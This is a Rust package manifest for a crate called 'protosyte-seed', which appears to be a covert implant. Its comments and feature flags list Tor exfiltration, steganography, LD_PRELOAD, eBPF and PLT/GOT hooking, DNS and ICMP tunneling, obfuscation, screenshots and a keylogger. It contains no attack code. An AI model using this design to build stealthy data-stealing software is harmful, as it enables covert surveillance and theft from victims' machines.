[package]
name = "protosyte-seed"
version = "3.0.0"
edition = "2021"

[lib]
name = "protosyte_seed"
crate-type = ["cdylib", "rlib"]

# Note: hook_lib.rs is built separately as a standalone shared library for LD_PRELOAD
# Build command: cargo build --lib --manifest-path Cargo.toml --features hook_lib
# Or create a separate crate in protosyte-seed-hook/

[dependencies]
# Protobuf serialization/deserialization (Primary)
prost = { version = "0.14", features = ["derive"] }
prost-types = "0.14"

# Network exfiltration over Tor
reqwest = { version = "0.12", features = ["rustls-tls", "socks", "multipart", "http2"] } # SOCKS5 proxy for Tor (fallback)
arti-client = { version = "0.36", features = ["tokio", "native-tls"] } # Embedded Tor client
tokio = { version = "1.48", features = ["full"] } # Async runtime

# HTTP/3 and QUIC support
quinn = { version = "0.11", optional = true } # QUIC protocol
quinn-proto = { version = "0.11", optional = true }

# WebSocket support
tokio-tungstenite = { version = "0.24", features = ["native-tls"], optional = true }
tungstenite = { version = "0.24", optional = true }

# In-memory data processing & steganography
image = { version = "0.25", default-features = false, features = ["png", "jpeg"] } # LSB steganography
pdf = { version = "0.9", optional = true } # PDF steganography
aes-gcm = "0.10" # Encryption of payloads
lz4 = "1.28" # Compression before encryption
zstd = { version = "0.13", optional = true } # Zstandard compression
lzma-rs = { version = "0.3", optional = true } # LZMA compression
brotli = { version = "8.0", optional = true } # Brotli compression
zeroize = { version = "1.8", features = ["zeroize_derive"] } # Securely zero memory

# System integration & stealth
libc = "0.2"
nix = { version = "0.28", features = ["process", "socket", "uio", "ptrace"] } # For syscalls, process manipulation
aya = { version = "0.13", features = ["async_tokio"], optional = true } # eBPF kernel-level hooking
goblin = { version = "0.8", optional = true } # ELF/PE parsing for PLT/GOT hijacking
pelite = { version = "0.10", optional = true } # PE parsing for Windows

# Forward Secrecy (Signal Protocol / Double Ratchet)
x25519-dalek = { version = "2.0", optional = true } # X25519 for X3DH
curve25519-dalek = { version = "4.0", optional = true } # Curve25519 operations
hkdf = { version = "0.12", optional = true } # HKDF for key derivation

# Post-quantum cryptography (optional)
pqcrypto-kyber = { version = "0.5", optional = true }  # Kyber-768 (ML-KEM)
pqcrypto-dilithium = { version = "0.5", optional = true }  # Dilithium-3 (ML-DSA)

# AI-driven filtering (optional)
ort = { version = "2.0.0-rc.10", optional = true }  # ONNX Runtime
ndarray = { version = "0.16", optional = true }  # Array operations for AI

# DNS and ICMP tunneling
dns-lookup = { version = "2.1", optional = true } # DNS queries
trust-dns-resolver = { version = "0.23", features = ["dns-over-https", "dns-over-tls"], optional = true }
pnet = { version = "0.34", optional = true } # Raw sockets for ICMP

# Certificate pinning and TLS inspection detection
rustls = { version = "0.23", optional = true }
rustls-pemfile = { version = "2.1", optional = true }
webpki = { version = "0.22", optional = true }

# Configuration and serialization
serde = { version = "1.0", features = ["derive"] }
serde_yaml = { version = "0.9", optional = true }
serde_json = "1.0"

# Additional utilities
sha2 = "0.10" # For HMAC-SHA256
hmac = "0.12" # For HMAC computation
pbkdf2 = "0.12" # PBKDF2 key derivation (more secure than SHA256)
hex = "0.4" # For hex encoding
rand = "0.9" # For jitter calculation
rand_core = "0.6" # Core trait for rand
regex = "1.10" # For pattern matching
ctor = "0.6.2" # For library constructors
base64 = "0.22" # Base64 encoding
base32 = "0.5" # Base32 encoding for DNS tunneling
parking_lot = "0.12" # Fast mutexes for ring buffers
crossbeam = { version = "0.8", features = ["alloc"] } # Lock-free data structures
once_cell = "1.20" # Lazy static initialization
thiserror = "1.0" # Error handling
anyhow = "1.0" # Error context
log = "0.4" # Logging
chrono = { version = "0.4", features = ["serde"] } # Time handling
urlencoding = "2.1" # URL encoding for polymorphic network
num_cpus = "1.16" # CPU count for eBPF
rand_distr = "0.5" # Random distributions for timing (compatible with rand 0.9)
hostname = "0.4" # Hostname detection
ipnetwork = "0.20" # IP network range checking
maxminddb = { version = "0.25", optional = true } # Geolocation
sysinfo = "0.30" # System information
[target.'cfg(windows)'.dependencies]
winapi = { version = "0.3", features = ["winuser", "processthreadsapi", "winbase", "winnls", "winsock2", "ws2def", "ws2ipdef", "iphlpapi"] }
windows = { version = "0.52", features = ["Win32_Foundation", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_System_SystemServices", "Win32_UI_WindowsAndMessaging", "Win32_System_Registry", "Win32_System_LibraryLoader", "Win32_System_Memory", "Win32_System_DataExchange"] }

# Screenshot and keylogger (optional, high-risk)
screenshots = { version = "0.7", optional = true } # Cross-platform screenshots
enigo = { version = "0.2", optional = true } # Keyboard/mouse input (for testing only)

[build-dependencies]
prost-build = "0.14"

[target.'cfg(all(target_arch = "x86_64", target_os = "linux"))'.build-dependencies]
# eBPF compilation requires clang/LLVM - handled by build.rs

[features]
default = []
obfuscate = []  # Enable compile-time obfuscation
post-quantum = ["pqcrypto-kyber", "pqcrypto-dilithium"]  # Enable post-quantum crypto
ai-filtering = ["ort", "ndarray"]  # Enable AI-driven data filtering
ebpf = ["aya"]  # Enable eBPF kernel-level hooking
forward-secrecy = ["x25519-dalek", "curve25519-dalek", "hkdf"]  # Signal Protocol / Double Ratchet
compression-adaptive = ["zstd", "lzma-rs", "brotli"]  # Adaptive compression
dns-tunnel = ["dns-lookup", "trust-dns-resolver"]  # DNS tunneling support
icmp-tunnel = ["pnet"]  # ICMP tunneling support
websocket = ["tokio-tungstenite", "tungstenite"]  # WebSocket support
quic = ["quinn", "quinn-proto"]  # QUIC/HTTP3 support
tls-pinning = ["rustls", "rustls-pemfile", "webpki"]  # Certificate pinning
geolocation = ["maxminddb"]  # Geolocation support
screenshot = ["screenshots"]  # Screenshot capture
keylogger = ["enigo"]  # Keylogger (high-risk, use with caution)
elf-parsing = ["goblin"]  # ELF parsing for Linux
pe-parsing = ["pelite"]  # PE parsing for Windows
config-yaml = ["serde_yaml"]  # YAML configuration support

[dependencies.protosyte-seed-macros]
path = "../protosyte-seed-macros"
version = "3.0.0"

[dev-dependencies]
tokio-test = "0.4"  # For async testing utilities
mockito = "1.2"  # For HTTP mocking
tempfile = "3.10"  # For temporary file testing

